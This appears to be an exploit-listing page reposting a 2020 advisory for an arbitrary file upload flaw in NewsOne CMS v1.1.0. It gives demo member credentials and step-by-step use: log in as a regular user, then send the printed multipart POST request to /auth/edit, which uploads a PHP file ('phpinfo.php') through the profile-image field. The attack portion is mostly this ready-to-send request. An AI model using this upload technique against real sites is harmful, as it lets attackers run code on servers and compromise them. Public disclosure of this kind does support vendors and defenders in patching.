Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

NewsOne CMS News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Exploit Title: NewsOne CMS  News, Magazine & Blog Script v1.1.0 Arbitrary File Upload
# Google Dork: -
# Date: 18/01/2020
# Exploit Author: m0ze
# Vendor Homepage:
# Software Link:
# Version: 1.1.0
# Tested on: Kali Linux
# CVE: -
# CWE: 434

----[]- Info: -[]----
Demo website:
Demo account: member/member12345 (login/password)
PoC Upload #0:
PoC Upload #1:
PoC Upload #2:
PoC Upload #3:

----[]- Arbitrary File Upload -> User Profile: -[]----
Auth as a regular user (member/member12345 for example) and upload any file you want on the page via <input type="file" name="user_image"> field.


POST /auth/edit HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 501
Connection: close
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="member_id"

Content-Disposition: form-data; name="user_image"; filename="phpinfo.php"
Content-Type: application/octet-stream

Content-Disposition: form-data; name="edit_user_photo"

Update Profile Photo

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.